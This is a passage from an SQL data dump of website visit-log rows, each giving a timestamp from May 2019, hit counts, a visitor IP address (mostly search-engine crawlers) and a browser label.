27','other'),(419004,1557466393,2,2,0,0,'66.249.66.220','chrome'),(419005,1557466732,1,1,0,0,'157.55.39.206','other'),(419006,1557467545,1,1,0,0,'178.154.200.8','other'),(419007,1557467921,1,1,0,0,'95.158.62.12','chrome'),(419008,1557468111,1,1,0,0,'66.249.66.128','chrome'),(419009,1557468531,1,1,0,0,'157.55.39.85','other'),(419010,1557468535,1,1,0,0,'66.249.66.222','chrome'),(419011,1557468629,1,1,0,0,'91.196.178.68','chrome'),(419012,1557468873,1,1,0,0,'66.249.66.220','chrome'),(419013,1557468931,1,1,0,0,'167.114.172.223','other'),(419014,1557468955,1,1,0,0,'167.114.172.223','chrome'),(419015,1557469058,1,1,0,0,'66.249.66.130','chrome'),(419016,1557469605,1,1,0,0,'66.249.66.132','chrome'),(419017,1557470109,1,1,0,0,'91.196.179.33','chrome'),(419018,1557470167,1,1,0,0,'66.249.66.222','chrome'),(419019,1557470453,1,1,0,0,'91.196.178.85','chrome'),(419020,1557470857,1,1,0,0,'66.249.66.132','chrome'),(419021,1557471104,2,2,0,0,'66.249.66.222','chrome'),(419022,1557471352,1,1,0,0,'95.163.255.165','other'),(419023,1557471959,1,1,0,0,'157.55.39.206','other'),(419024,1557472060,1,1,0,0,'212.1.124.141','chrome'),(419025,1557472100,2,2,0,0,'207.46.13.70','other'),(419026,1557472263,1,1,0,0,'92.43.83.46','chrome'),(419027,1557472884,1,1,0,0,'40.77.167.171','other'),(419028,1557473553,1,1,0,0,'157.55.39.206','other'),(419029,1557474050,1,1,0,0,'66.249.66.222','chrome'),(419030,1557474179,1,1,0,0,'95.108.181.94','other'),(419031,1557474345,1,1,0,0,'207.46.13.193','other'),(419032,1557474701,1,1,0,0,'91.196.178.85','chrome'),(419033,1557474714,1,1,0,0,'66.249.66.132','chrome'),(419034,1557474771,2,2,0,0,'66.249.66.218','chrome'),(419035,1557474941,1,1,0,0,'141.8.142.191','other'),(419036,1557475361,1,1,0,0,'5.45.207.76','other'),(419037,1557475418,2,2,0,0,'66.249.66.220','chrome'),(419038,1557475738,1,1,0,0,'66.249.66.218','chrome'),(419039,1557476399,41,41,0,0,'178.63.11.212','other'),(419040,1557476470,1,1,0,0,'194.37.248.11','chrome'),(419041,1557476520,1,1,0,0,'95.163.255.164','other'),(419042,1557476550,1,1,0,0,'95.163.255.99','other'),(419043,1557476602,2,2,0,0,'66.249.66.222','chrome'),(419044,1557476979,1,1,0,0,'8.29.198.26','other'),(419045,1557476992,1,1,0,0,'8.29.198.27','other'),(419046,1557477263,10,10,0,0,'144.76.3.79','other'),(419047,1557477420,1,1,0,0,'66.249.66.220','chrome'),(419048,1557478417,1,1,0,0,'91.196.178.169','chrome'),(419049,1557478627,1,1,0,0,'66.249.66.222','chrome'),(419050,1557478873,2,2,0,0,'66.249.66.220','chrome'),(419051,1557479626,1,1,0,0,'178.154.244.11','other'),(419052,1557479719,1,1,0,0,'141.8.142.65','other'),(419053,1557479836,2,2,0,0,'213.180.203.53','other'),(419054,1557479854,1,1,0,0,'141.8.142.162','other'),(419055,1557479987,1,1,0,0,'213.180.203.61','other'),(419056,1557480270,1,1,0,0,'141.8.142.191','other'),(419057,1557480273,1,1,0,0,'141.8.132.16','other'),(419058,1557480430,2,2,0,0,'66.249.66.222','chrome'),(419059,1557480736,1,1,0,0,'87.250.224.107','other'),(419060,1557481079,1,1,0,0,'207.46.13.193','other'),(419061,1557481672,2,2,0,0,'213.180.203.53','other'),(419062,1557481830,1,1,0,0,'91.196.178.169','chrome'),(419063,1557482186,2,2,0,0,'91.196.177.15','chrome'),(419064,1557482471,3,3,0,0,'35.184.43.138','chrome'),(419065,1557482561,3,3,0,0,'35.225.247.7','chrome'),(419066,1557482574,3,3,0,0,'35.193.70.26','chrome'),(419067,1557482587,3,3,0,0,'35.188.71.86','chrome'),(419068,1557482602,3,3,0,0,'35.238.149.79','chrome'),(419069,1557482616,3,3,0,0,'35.193.52.185','chrome'),(419070,1557482652,1,1,0,0,'185.30.202.79','firefox'),(419071,1557482820,1,1,0,0,'95.163.255.161','other'),(419072,1557483004,2,2,0,0,'66.249.66.222','chrome'),(419073,1557483075,1,1,0,0,'109.74.154.72','chrome'),(419074,1557483662,1,1,0,0,'157.55.39.244','other'),(419075,1557483750,1,1,0,0,'46.133.149.32','firefox'),(419076,1557483783,2,2,0,0,'37.9.113.148','other'),(419077,1557484126,1,1,0,0,'5.255.253.22','other'),(419078,1557484163,1,1,0,0,'87.250.224.64','other'),(419079,1557484281,1,1,0,0,'66.249.66.128','chrome'),(419080,1557484404,1,1,0,0,'178.154.244.11','other'),(419081,1557484441,1,1,0,0,'207.46.13.70','other'),(419082,1557484532,1,1,0,0,'37.9.113.38','other'),(419083,1557484707,1,1,0,0,'95.108.181.83','other'),(419084,1557486272,1,1,0,0,'66.249.66.128','chrome'),(419085,1557486323,2,2,0,0,'66.249.66.218','chrome'),(419086,1557486529,1,1,0,0,'93.183.212.130','chrome'),(419087,1557486544,1,1,0,0,'66.249.66.222','chrome'),(419088,1557486674,1,1,0,0,'157.55.39.244','other'),(419089,1557486758,1,1,0,0,'66.249.66.130','chrome'),(419090,1557487382,2,2,0,0,'40.77.167.69','other'),(419091,1557487824,2,2,0,0,'8.29.198.27','other'),(419092,1557488235,1,1,0,0,'66.249.66.220','chrome'),(419093,1557488321,1,1,0,0,'95.163.255.93','other'),(419094,1557488417,1,1,0,0,'66.249.66.132','chrome'),(419095,1557488446,1,1,0,0,'66.249.66.222','chrome'),(419096,1557488476,1,1,0,0,'91.196.178.85','chrome'),(419097,1557488607,1,1,0,0,'5.45.207.8','other'),(419098,1557488761,1,1,0,0,'66.249.66.218','chrome'),(419099,1557488780,1,1,0,0,'157.55.39.206','other'),(419100,1557488878,1,1,0,0,'87.250.224.107','other'),(419101,1557488912,1,1,0,0,'141.8.142.65','other'),(419102,1557489051,1,1,0,0,'213.180.203.23','other'),(419103,1557489345,1,1,0,0,'66.249.66.220','chrome'),(419104,1557489437,1,1,0,0,'95.163.255.183','other'),(419105,1557489517,1,1,0,0,'91.196.178.178','chrome'),(419106,1557490267,1,1,0,0,'178.154.200.8','other'),(419107,1557490635,1,1,0,0,'178.154.171.17','other'),(419108,1557490818,1,1,0,0,'91.196.178.85','chrome'),(419109,1557490947,1,1,0,0,'91.196.178.180','chrome'),(419110,1557491187,1,1,0,0,'91.196.178.68','chrome'),(419111,1557491285,1,1,0,0,'66.249.66.220','chrome'),(419112,1557491353,1,1,0,0,'66.249.66.218','chrome'),(419113,1557491415,1,1,0,0,'95.132.54.163','chrome'),(419114,1557492107,1,1,0,0,'91.196.178.92','chrome'),(419115,1557492554,1,1,0,0,'89.162.132.82','chrome'),(419116,1557492893,2,2,0,0,'207.46.13.1','other'),(419117,1557493019,1,1,0,0,'141.8.142.191','other'),(419118,1557493155,1,1,0,0,'46.164.139.130','firefox'),(419119,1557493326,1,1,0,0,'66.249.66.222','chrome'),(419120,1557493352,1,1,0,0,'207.46.13.109','other'),(419121,1557493464,2,2,0,0,'66.249.66.220','chrome'),(419122,1557493585,1,1,0,0,'66.249.66.218','chrome'),(419123,1557494248,1,1,0,0,'95.163.255.95','other'),(419124,1557494251,1,1,0,0,'95.163.255.99','other'),(419125,1557494426,1,1,0,0,'207.46.13.109','other'),(419126,1557494490,1,1,0,0,'207.46.13.43','other'),(419127,1557495281,1,1,0,0,'66.249.66.222','chrome'),(419128,1557495585,24,24,0,0,'51.38.162.236','other'),(419129,1557495891,1,1,0,0,'180.76.15.140','other'),(419130,1557496792,2,2,0,0,'66.249.66.218','chrome'),(419131,1557497191,1,1,0,0,'66.249.66.222','chrome'),(419132,1557497315,12,12,0,0,'5.9.156.121','other'),(419133,1557497459,1,1,0,0,'66.249.66.220','chrome'),(419134,1557497904,1,1,0,0,'207.46.13.1','other'),(419135,1557498715,1,1,0,0,'8.29.198.25','other'),(419136,1557498733,1,1,0,0,'8.29.198.27','other'),(419137,1557499069,1,1,0,0,'66.249.66.132','chrome'),(419138,1557499745,1,1,0,0,'207.46.13.109','other'),(419139,1557499973,1,1,0,0,'94.153.196.190','chrome'),(419140,1557500478,2,2,0,0,'66.249.66.220','chrome'),(419141,1557500788,1,1,0,0,'207.46.13.1','other'),(419142,1557501021,1,1,0,0,'207.46.13.109','other'),(419143,1557501099,1,1,0,0,'66.249.66.132','chrome'),(419144,1557501151,1,1,0,0,'66.249.66.222','chrome'),(419145,1557501300,1,1,0,0,'66.249.66.128','chrome'),(419146,1557501527,1,1,0,0,'93.158.166.7','other'),(419147,1557501700,1,1,0,0,'95.216.1.46','other'),(419148,1557502147,1,1,0,0,'77.222.143.222','msie'),(419149,1557502164,1,1,0,0,'66.249.66.132','chrome'),(419150,1557502507,1,1,0,0,'66.249.66.130','chrome'),(419151,1557503085,1,1,0,0,'207.46.13.109','other'),(419152,1557503325,1,1,0,0,'157.55.39.4','other'),(419153,1557504297,1,1,0,0,'207.46.13.1','other'),(419154,1557504677,1,1,0,0,'95.163.255.152','other'),(419155,1557504740,1,1,0,0,'95.108.181.57','other'),(419156,1557505360,1,1,0,0,'95.108.181.94','other'),(419157,1557505422,1,1,0,0,'213.180.203.48','other'),(419158,1557505874,1,1,0,0,'93.158.166.7','other'),(419159,1557506688,1,1,0,0,'95.163.255.94','other'),(419160,1557506995,1,1,0,0,'66.249.66.220','chrome'),(419161,1557507272,1,1,0,0,'207.46.13.1','other'),(419162,1557507844,2,2,0,0,'66.249.66.222','chrome'),(419163,1557508314,1,1,0,0,'207.46.13.180','other'),(419164,1557508454,1,1,0,0,'66.249.66.132','chrome'),(419165,1557509278,1,1,0,0,'141.8.142.162','other'),(419166,1557509313,1,1,0,0,'37.9.113.38','other'),(419167,1557509408,1,1,0,0,'5.255.253.16','other'),(419168,1557509562,1,1,0,0,'8.29.198.27','other'),(419169,1557509570,1,1,0,0,'66.249.66.218','chrome'),(419170,1557509605,1,1,0,0,'8.29.198.25','other'),(419171,1557510077,1,1,0,0,'157.55.39.4','other'),(419172,1557511276,1,1,0,0,'66.249.66.222','chrome'),(419173,1557511300,1,1,0,0,'40.77.167.70','other'),(419174,1557511611,1,1,0,0,'46.211.125.122','chrome'),(419175,1557511787,1,1,0,0,'95.163.255.95','other'),(419176,1557511920,1,1,0,0,'95.163.255.96','other'),(419177,1557512012,2,2,0,0,'95.163.255.188','other'),(419178,1557512182,1,1,0,0,'66.249.66.222','chrome'),(419179,1557512289,1,1,0,0,'157.55.39.4','other'),(419180,1557512581,2,2,0,0,'66.249.66.128','chrome'),(419181,1557513045,1,1,0,0,'66.249.66.218','chrome'),(419182,1557513061,1,1,0,0,'66.249.66.220','chrome'),(419183,1557513325,1,1,0,0,'207.46.13.180','other'),(419184,1557513381,1,1,0,0,'66.249.66.222','chrome'),(419185,1557513388,1,1,0,0,'185.15.56.22','other'),(419186,1557513704,1,1,0,0,'157.55.39.4','other'),(419187,1557513887,1,1,0,0,'178.154.171.69','other'),(419188,1557513910,1,1,0,0,'91.196.178.84','firefox'),(419189,1557514458,1,1,0,0,'66.249.66.218','chrome'),(419190,1557515132,1,1,0,0,'66.249.66.130','chrome'),(419191,1557515297,1,1,0,0,'193.106.30.98','chrome'),(419192,1557516285,1,1,0,0,'95.163.255.179','other'),(419193,1557516980,1,1,0,0,'66.249.66.222','chrome'),(419194,1557517302,1,1,0,0,'66.249.66.218','chrome'),(419195,1557517532,1,1,0,0,'66.249.66.220','chrome'),(419196,1557517543,1,1,0,0,'95.163.255.98','other'),(419197,1557517883,2,2,0,0,'207.46.13.180','other'),(419198,1557518207,1,1,0,0,'178.154.171.30','other'),(419199,1557518211,1,1,0,0,'178.154.200.8','other'),(419200,1557518215,1,1,0,0,'141.8.142.162','other'),(419201,1557518223,1,1,0,0,'178.154.244.11','other'),(419202,1557518339,3,3,0,0,'66.249.66.218','chrome'),(419203,1557518460,1,1,0,0,'141.8.142.65','other'),(419204,1557518629,1,1,0,0,'95.163.255.181','other'),(419205,1557518912,1,1,0,0,'207.46.13.180','other'),(419206,1557519163,2,2,0,0,'66.249.66.222','chrome'),(419207,1557520027,1,1,0,0,'66.249.66.128','chrome'),(419208,1557520164,1,1,0,0,'66.249.66.218','chrome'),(419209,1557520505,1,1,0,0,'8.29.198.25','other'),(419210,1557520535,1,1,0,0,'8.29.198.27','other'),(419211,1557520589,1,1,0,0,'40.77.167.9','other'),(419212,1557520593,1,1,0,0,'66.249.66.220','chrome'),(419213,1557520605,1,1,0,0,'87.250.224.64','other'),(419214,1557520827,1,1,0,0,'66.249.66.222','chrome'),(419215,1557521469,1,1,0,0,'40.77.167.70','other'),(419216,1557521707,1,1,0,0,'95.163.255.173','other'),(419217,1557522423,1,1,0,0,'95.163.255.164','other'),(419218,1557522506,1,1,0,0,'66.249.66.218','chrome'),(419219,1557522507,2,2,0,0,'5.255.253.16','other'),(419220,1557522681,1,1,0,0,'178.154.171.69','other'),(419221,1557522816,1,1,0,0,'178.154.200.8','other'),(419222,1557522912,1,1,0,0,'95.108.213.50','other'),(419223,1557523228,1,1,0,0,'66.249.66.132','chrome'),(419224,1557524022,2,2,0,0,'207.46.13.180','other'),(419225,1557524077,1,1,0,0,'40.77.167.70','other'),(419226,1557524166,1,1,0,0,'66.249.66.132','chrome'),(419227,1557524278,1,1,0,0,'95.163.255.166','other'),(419228,1557524310,2,2,0,0,'207.46.13.41','other'),(419229,1557525777,1,1,0,0,'66.249.66.222','chrome'),(419230,1557525898,2,2,0,0,'66.249.66.220','chrome'),(419231,1557525910,1,1,0,0,'207.46.13.132','other'),(419232,1557525964,1,1,0,0,'128.72.24.255','msie'),(419233,1557526372,1,1,0,0,'95.108.181.94','other'),(419234,1557526442,1,1,0,0,'87.250.224.99','other'),(419235,1557526453,1,1,0,0,'95.108.181.57','other'),(419236,1557526610,1,1,0,0,'95.108.213.50','other'),(419237,1557527075,1,1,0,0,'66.249.66.218','chrome'),(419238,1557527647,1,1,0,0,'66.249.66.130','chrome'),(419239,1557528004,3,3,0,0,'34.66.26.155','chrome'),(419240,1557528134,3,3,0,0,'35.184.244.218','chrome'),(419241,1557528189,3,3,0,0,'35.238.151.99','chrome'),(419242,1557528218,3,3,0,0,'35.225.21.107','chrome'),(419243,1557528244,3,3,0,0,'35.202.78.198','chrome'),(419244,1557528263,2,2,0,0,'207.46.13.180','other'),(419245,1557528270,3,3,0,0,'35.226.56.200','chrome'),(419246,1557528802,1,1,0,0,'66.249.66.130','chrome'),(419247,1557529397,2,2,0,0,'66.249.66.220','chrome'),(419248,1557529712,1,1,0,0,'66.249.66.132','chrome'),(419249,1557529818,1,1,0,0,'95.163.255.92','other'),(419250,1557529930,1,1,0,0,'66.249.66.218','chrome'),(419251,1557529949,1,1,0,0,'207.46.13.132','other'),(419252,1557530954,1,1,0,0,'95.108.181.96','other'),(419253,1557531360,2,2,0,0,'8.29.198.25','other'),(419254,1557532107,1,1,0,0,'66.249.66.132','chrome'),(419255,1557532120,1,1,0,0,'66.249.66.220','chrome'),(419256,1557533059,2,2,0,0,'66.249.66.222','chrome'),(419257,1557533161,1,1,0,0,'178.154.244.49','other'),(419258,1557533237,1,1,0,0,'37.9.113.20','other'),(419259,1557533790,1,1,0,0,'66.249.66.220','chrome'),(419260,1557533804,1,1,0,0,'13.66.139.0','other'),(419261,1557534042,1,1,0,0,'207.46.13.79','other'),(419262,1557534219,1,1,0,0,'66.249.66.130','chrome'),(419263,1557534304,1,1,0,0,'5.45.207.8','other'),(419264,1557534347,1,1,0,0,'141.8.142.144','other'),(419265,1557534426,1,1,0,0,'95.163.255.158','other'),(419266,1557534585,1,1,0,0,'66.249.66.218','chrome'),(419267,1557534698,1,1,0,0,'141.8.132.16','other'),(419268,1557536028,1,1,0,0,'66.249.66.132','chrome'),(419269,1557536249,1,1,0,0,'40.77.167.35','other'),(419270,1557536314,1,1,0,0,'95.108.181.83','other'),(419271,1557536721,3,3,0,0,'66.249.66.220','chrome'),(419272,1557537361,1,1,0,0,'66.249.66.222','chrome'),(419273,1557537666,1,1,0,0,'5.45.207.79','other'),(419274,1557538452,1,1,0,0,'66.249.66.218','chrome'),(419275,1557539091,1,1,0,0,'207.46.13.132','other'),(419276,1557539269,2,2,0,0,'37.9.113.38','other'),(419277,1557539275,1,1,0,0,'5.45.207.19','other'),(419278,1557539278,1,1,0,0,'178.154.171.27','other'),(419279,1557539281,1,1,0,0,'5.255.253.25','other'),(419280,1557539339,1,1,0,0,'5.255.253.16','other'),(419281,1557539676,1,1,0,0,'66.249.66.222','chrome'),(419282,1557540589,1,1,0,0,'5.45.207.79','other'),(419283,1557540592,2,2,0,0,'178.154.244.11','other'),(419284,1557540600,1,1,0,0,'5.45.207.19','other'),(419285,1557540783,1,1,0,0,'207.46.13.132','other'),(419286,1557541105,1,1,0,0,'95.163.255.152','other'),(419287,1557541544,1,1,0,0,'95.163.255.93','other'),(419288,1557541641,1,1,0,0,'207.46.13.79','other'),(419289,1557541912,1,1,0,0,'66.249.66.130','chrome'),(419290,1557542216,1,1,0,0,'8.29.198.26','other'),(419291,1557542257,1,1,0,0,'8.29.198.25','other'),(419292,1557542594,1,1,0,0,'95.163.255.99','other'),(419293,1557542602,1,1,0,0,'66.249.66.220','chrome'),(419294,1557543549,1,1,0,0,'157.55.39.241','other'),(419295,1557544245,1,1,0,0,'66.249.66.220','chrome'),(419296,1557545079,1,1,0,0,'40.77.167.93','other'),(419297,1557545551,1,1,0,0,'31.13.127.1','other'),(419298,1557545552,1,1,0,0,'31.13.127.30','other'),(419299,1557545682,1,1,0,0,'95.108.181.96','other'),(419300,1557546045,2,2,0,0,'141.8.142.65','other'),(419301,1557546060,1,1,0,0,'66.249.66.128','chrome'),(419302,1557546275,1,1,0,0,'66.249.66.222','chrome'),(419303,1557546532,2,2,0,0,'66.249.66.218','chrome'),(419304,1557546575,1,1,0,0,'91.196.178.134','firefox'),(419305,1557547313,1,1,0,0,'66.249.66.130','chrome'),(419306,1557547620,1,1,0,0,'213.180.203.48','other'),(419307,1557547886,1,1,0,0,'66.249.66.220','chrome'),(419308,1557549271,1,1,0,0,'104.148.64.26','chrome'),(419309,1557549593,1,1,0,0,'66.249.66.132','chrome'),(419310,1557549730,1,1,0,0,'178.154.244.11','other'),(419311,1557549845,1,1,0,0,'66.249.66.222','chrome'),(419312,1557549921,1,1,0,0,'178.154.171.30','other'),(419313,1557550304,4,4,0,0,'207.46.13.132','other'),(419314,1557550311,5,5,0,0,'207.46.13.79','other'),(419315,1557550321,7,7,0,0,'207.46.13.18','other'),(419316,1557550379,7,7,0,0,'207.46.13.53','other'),(419317,1557550613,2,2,0,0,'34.218.245.181','chrome'),(419318,1557551678,1,1,0,0,'66.249.66.218','chrome'),(419319,1557552099,1,1,0,0,'178.154.244.65','other'),(419320,1557552173,2,2,0,0,'66.249.66.220','chrome'),(419321,1557552175,1,1,0,0,'185.220.101.30','other'),(419322,1557552302,1,1,0,0,'66.249.66.130','chrome'),(419323,1557552387,1,1,0,0,'207.46.13.98','other'),(419324,1557553071,1,1,0,0,'66.249.66.218','chrome'),(419325,1557553078,1,1,0,0,'8.29.198.26','other'),(419326,1557553108,1,1,0,0,'8.29.198.27','other'),(419327,1557553285,1,1,0,0,'91.196.178.134','firefox'),(419328,1557553320,1,1,0,0,'66.249.66.222','chrome'),(419329,1557553422,1,1,0,0,'66.249.66.220','chrome'),(419330,1557553739,1,1,0,0,'207.46.13.18','other'),(419331,1557553874,1,1,0,0,'141.8.142.103','other'),(419332,1557553880,1,1,0,0,'5.45.207.79','other'),(419333,1557554240,1,1,0,0,'178.154.244.11','other'),(419334,1557554536,2,2,0,0,'66.249.66.218','chrome'),(419335,1557555032,1,1,0,0,'95.163.255.95','other'),(419336,1557555148,1,1,0,0,'95.163.255.98','other'),(419337,1557555364,1,1,0,0,'95.163.255.156','other'),(419338,1557555674,1,1,0,0,'66.249.66.132','chrome'),(419339,1557555809,1,1,0,0,'31.128.80.194','chrome'),(419340,1557556619,3,3,0,0,'207.46.13.18','other'),(419341,1557556888,1,1,0,0,'66.249.66.222','chrome'),(419342,1557557278,1,1,0,0,'66.249.66.218','chrome'),(419343,1557557508,1,1,0,0,'157.55.39.138','other'),(419344,1557558300,1,1,0,0,'178.154.244.49','other'),(419345,1557559009,1,1,0,0,'157.55.39.138','other'),(419346,1557559352,1,1,0,0,'95.163.255.95','other'),(419347,1557559508,1,1,0,0,'92.60.181.97','chrome'),(419348,1557559615,1,1,0,0,'5.45.207.19','other'),(419349,1557560722,1,1,0,0,'92.112.224.113','chrome'),(419350,1557561181,2,2,0,0,'157.55.39.138','other'),(419351,1557561234,1,1,0,0,'94.178.107.221','chrome'),(419352,1557561383,1,1,0,0,'91.196.178.184','chrome'),(419353,1557561714,1,1,0,0,'91.196.178.68','firefox'),(419354,1557561780,1,1,0,0,'66.249.66.218','chrome'),(419355,1557562187,1,1,0,0,'141.8.142.103','other'),(419356,1557562240,2,2,0,0,'178.154.244.11','other'),(419357,1557562252,1,1,0,0,'91.196.178.85','chrome'),(419358,1557562365,1,1,0,0,'87.250.224.65','other'),(419359,1557563563,2,2,0,0,'157.55.39.218','other'),(419360,1557563943,1,1,0,0,'8.29.198.26','other'),(419361,1557563968,1,1,0,0,'8.29.198.25','other'),(419362,1557564101,1,1,0,0,'103.215.139.38','firefox'),(419363,1557564157,1,1,0,0,'209.58.184.163','msie'),(419364,1557564204,2,2,0,0,'66.249.66.220','chrome'),(419365,1557564727,1,1,0,0,'5.45.207.79','other'),(419366,1557564795,1,1,0,0,'66.249.66.222','chrome'),(419367,1557565645,2,2,0,0,'157.55.39.138','other'),(419368,1557566049,1,1,0,0,'66.249.66.220','chrome'),(419369,1557566549,2,2,0,0,'207.46.13.18','other'),(419370,1557566971,1,1,0,0,'37.9.113.103','other'),(419371,1557567299,2,2,0,0,'95.108.213.4','other'),(419372,1557567743,2,2,0,0,'66.249.66.222','chrome'),(419373,1557567788,1,1,0,0,'157.55.39.138','other'),(419374,1557568079,1,1,0,0,'66.249.66.218','chrome'),(419375,1557568277,1,1,0,0,'141.8.142.103','other'),(419376,1557568674,2,2,0,0,'91.196.177.15','chrome'),(419377,1557568791,1,1,0,0,'109.74.154.72','chrome'),(419378,1557569186,1,1,0,0,'66.249.66.218','chrome'),(419379,1557569444,1,1,0,0,'66.249.66.128','chrome'),(419380,1557569709,1,1,0,0,'157.55.39.138','other'),(419381,1557570086,1,1,0,0,'157.55.39.126','other'),(419382,1557570738,1,1,0,0,'95.163.255.93','other'),(419383,1557570836,2,2,0,0,'66.249.66.220','chrome'),(419384,1557570858,2,2,0,0,'66.249.66.218','chrome'),(419385,1557571096,1,1,0,0,'95.163.255.92','other'),(419386,1557571266,3,3,0,0,'34.66.85.244','chrome'),(419387,1557571353,3,3,0,0,'34.66.180.133','chrome'),(419388,1557571391,3,3,0,0,'35.225.234.83','chrome'),(419389,1557571421,3,3,0,0,'35.232.12.68','chrome'),(419390,1557571450,3,3,0,0,'35.232.108.170','chrome'),(419391,1557571467,3,3,0,0,'35.184.80.253','chrome'),(419392,1557571482,1,1,0,0,'91.196.178.101','chrome'),(419393,1557572016,1,1,0,0,'157.55.39.138','other'),(419394,1557572038,1,1,0,0,'141.8.142.103','other'),(419395,1557572430,1,1,0,0,'206.189.131.203','firefox'),(419396,1557572613,2,2,0,0,'95.108.213.4','other'),(419397,1557572777,1,1,0,0,'178.154.244.11','other'),(419398,1557573060,1,1,0,0,'5.45.207.19','other'),(419399,1557573111,2,2,0,0,'5.45.207.79','other'),(419400,1557573740,1,1,0,0,'40.77.167.74','other'),(419401,1557573829,1,1,0,0,'141.8.142.103','other'),(419402,1557574663,1,1,0,0,'66.249.66.220','chrome'),(419403,1557574811,1,1,0,0,'8.29.198.26','other'),(419404,1557574824,1,1,0,0,'8.29.198.27','other'),(419405,1557575632,1,1,0,0,'91.233.90.6','chrome'),(419406,1557575666,1,1,0,0,'40.77.167.181','other'),(419407,1557578051,1,1,0,0,'209.17.97.34','other'),(419408,1557578390,1,1,0,0,'40.77.167.97','other'),(419409,1557579328,1,1,0,0,'66.249.66.218','chrome'),(419410,1557579896,1,1,0,0,'66.249.66.128','chrome'),(419411,1557580604,1,1,0,0,'157.55.39.218','other'),(419412,1557581149,1,1,0,0,'5.45.207.79','other'),(419413,1557581152,1,1,0,0,'5.45.207.19','other'),(419414,1557581227,2,2,0,0,'40.77.167.97','other'),(419415,1557582081,2,2,0,0,'91.196.178.132','chrome'),(419416,1557582323,1,1,0,0,'5.45.207.79','other'),(419417,1557582527,2,2,0,0,'40.77.167.106','other'),(419418,1557582746,1,1,0,0,'66.249.66.128','chrome'),(419419,1557582903,2,2,0,0,'66.249.66.222','chrome'),(419420,1557582909,1,1,0,0,'40.77.167.181','other'),(419421,1557582937,2,2,0,0,'40.77.167.97','other'),(419422,1557583239,1,1,0,0,'66.249.66.132','chrome'),(419423,1557583519,1,1,0,0,'51.68.152.26','chrome'),(419424,1557584037,1,1,0,0,'66.249.66.222','chrome'),(419425,1557585480,1,1,0,0,'40.77.167.175','other'),(419426,1557585649,2,2,0,0,'5.45.207.79','other'),(419427,1557585673,1,1,0,0,'8.29.198.25','other'),(419428,1557585680,1,1,0,0,'8.29.198.27','other'),(419429,1557585742,1,1,0,0,'40.77.167.181','other'),(419430,1557585809,1,1,0,0,'95.163.255.164','other'),(419431,1557586017,1,1,0,0,'95.163.255.92','other'),(419432,1557586207,1,1,0,0,'40.77.167.163','other'),(419433,1557586492,1,1,0,0,'178.154.244.11','other'),(419434,1557586782,1,1,0,0,'40.77.167.181','other'),(419435,1557587713,1,1,0,0,'66.249.66.220','chrome'),(419436,1557587745,2,2,0,0,'66.249.66.218','chrome'),(419437,1557588000,1,1,0,0,'66.249.66.222','chrome'),(419438,1557588655,1,1,0,0,'66.249.66.128','chrome'),(419439,1557588862,2,2,0,0,'207.46.13.114','other'),(419440,1557589687,1,1,0,0,'139.59.92.2','firefox'),(419441,1557590759,1,1,0,0,'95.163.255.97','other'),(419442,1557592161,1,1,0,0,'66.249.66.220','chrome'),(419443,1557592632,1,1,0,0,'40.77.167.163','other'),(419444,1557592634,1,1,0,0,'93.80.234.159','chrome'),(419445,1557593006,1,1,0,0,'207.46.13.114','other'),(419446,1557593737,2,2,0,0,'157.55.39.141','other'),(419447,1557593944,1,1,0,0,'207.46.13.114','other'),(419448,1557594657,1,1,0,0,'213.180.203.17','other'),(419449,1557594695,2,2,0,0,'178.154.244.11','other'),(419450,1557594932,1,1,0,0,'207.46.13.114','other'),(419451,1557595318,1,1,0,0,'66.249.66.222','chrome'),(419452,1557595571,1,1,0,0,'95.163.255.97','other'),(419453,1557595576,1,1,0,0,'5.45.207.79','other'),(419454,1557595862,1,1,0,0,'95.163.255.95','other'),(419455,1557595908,3,3,0,0,'66.249.66.220','chrome'),(419456,1557596015,3,3,0,0,'157.55.39.141','other'),(419457,1557596158,1,1,0,0,'66.249.66.132','chrome'),(419458,1557596432,1,1,0,0,'207.46.13.114','other'),(419459,1557596545,1,1,0,0,'8.29.198.26','other'),(419460,1557596565,1,1,0,0,'8.29.198.25','other'),(419461,1557596687,1,1,0,0,'66.249.66.218','chrome'),(419462,1557596859,1,1,0,0,'95.163.255.166','other'),(419463,1557597502,1,1,0,0,'141.8.142.103','other'),(419464,1557597875,1,1,0,0,'40.77.167.163','other'),(419465,1557597967,1,1,0,0,'176.113.170.104','chrome'),(419466,1557598519,2,2,0,0,'178.154.244.11','other'),(419467,1557598573,1,1,0,0,'66.249.66.222','chrome'),(419468,1557598606,1,1,0,0,'5.45.207.79','other'),(419469,1557599610,1,1,0,0,'5.45.207.79','other'),(419470,1557599637,1,1,0,0,'95.163.255.97','other'),(419471,1557600175,1,1,0,0,'178.154.244.11','other'),(419472,1557600224,3,3,0,0,'207.46.13.114','other'),(419473,1557601222,2,2,0,0,'207.46.13.243','other'),(419474,1557601530,3,3,0,0,'40.77.167.163','other'),(419475,1557602006,1,1,0,0,'66.249.66.218','chrome'),(419476,1557602201,2,2,0,0,'207.46.13.243','other'),(419477,1557602342,3,3,0,0,'207.46.13.114','other'),(419478,1557602351,1,1,0,0,'40.77.167.3','other'),(419479,1557602358,1,1,0,0,'141.8.142.103','other'),(419480,1557602494,2,2,0,0,'178.154.244.11','other'),(419481,1557602919,1,1,0,0,'13.66.139.0','other'),(419482,1557602936,1,1,0,0,'5.45.207.19','other'),(419483,1557603321,2,2,0,0,'66.249.66.222','chrome'),(419484,1557603520,1,1,0,0,'5.45.207.79','other'),(419485,1557604193,1,1,0,0,'66.249.66.218','chrome'),(419486,1557605110,1,1,0,0,'207.46.13.243','other'),(419487,1557605241,1,1,0,0,'95.163.255.94','other'),(419488,1557605312,1,1,0,0,'95.163.255.98','other'),(419489,1557605314,1,1,0,0,'95.163.255.96','other'),(419490,1557605833,1,1,0,0,'66.249.66.128','chrome'),(419491,1557606334,1,1,0,0,'66.249.65.214','chrome'),(419492,1557606946,1,1,0,0,'141.8.142.103','other'),(419493,1557607176,1,1,0,0,'178.154.244.11','other'),(419494,1557607368,1,1,0,0,'5.45.207.79','other'),(419495,1557607411,2,2,0,0,'8.29.198.27','other'),(419496,1557608573,1,1,0,0,'157.55.39.171','other'),(419497,1557608837,1,1,0,0,'5.45.207.19','other'),(419498,1557609448,1,1,0,0,'40.77.167.79','other'),(419499,1557609989,1,1,0,0,'95.163.255.178','other'),(419500,1557610444,2,2,0,0,'66.249.65.212','chrome'),(419501,1557610626,1,1,0,0,'66.249.65.216','chrome'),(419502,1557610880,1,1,0,0,'141.8.142.103','other'),(419503,1557612635,1,1,0,0,'207.46.13.243','other'),(419504,1557612689,1,1,0,0,'157.55.39.171','other'),(419505,1557613606,1,1,0,0,'66.249.73.7','chrome'),(419506,1557614415